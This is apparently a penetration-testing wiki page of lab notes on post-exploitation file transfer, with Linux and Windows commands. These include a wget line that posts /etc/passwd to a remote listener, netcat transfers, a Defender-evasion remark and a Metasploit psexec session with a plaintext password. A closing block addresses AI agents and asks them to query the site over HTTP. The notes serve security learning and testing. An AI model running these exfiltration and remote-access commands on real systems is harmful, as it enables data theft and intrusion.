# File Transfers ### Linux ``` # HOST FILES python -m SimpleHTTPServer 80 # OR python3 -m http.server 80 python -m pyftpdlib -p 21 # FTP # GRAB FILES wget http://:80/secrets.txt # RECEIVE FILES nc -nvlp file # redirect into new file # SEND FILES ## nc nc < file ## wget, receiver has to clean the file wget --post-file=/etc/passwd 192.168.202.128:8081 tail -n +10 file > clean_file # delete transfer data ``` ### Windows ``` # Windows Defender can block this, though there are ways to split files to bypass # GRAB FILES - HTTP C:\Users\fcastle>certutil -rulcache -f http:///secrets.txt secrets.txt # GRAB FILES - FTP C:\Users\fcastle>ftp ftp> get ``` #### **Meterpreter** ``` msf5 > use windows/smb/psexec msf5 exploit(windows/smb/psexec) > set rhosts 192.168.202.134 msf5 exploit(windows/smb/psexec) > set smbdomain marvel msf5 exploit(windows/smb/psexec) > set smbpass Password1 msf5 exploit(windows/smb/psexec) > set smbuser fcastle msf5 exploit(windows/smb/psexec) > set target 2 msf5 exploit(windows/smb/psexec) > run ... meterpreter > cd c:\\users meterpreter > upload /root/files/secrets.txt c:\\secrets.txt meterpreter > download c:\\secrets.txt secrets.txt ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://wiki.zacheller.dev/pentest/post-exploitation/file-transfers.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.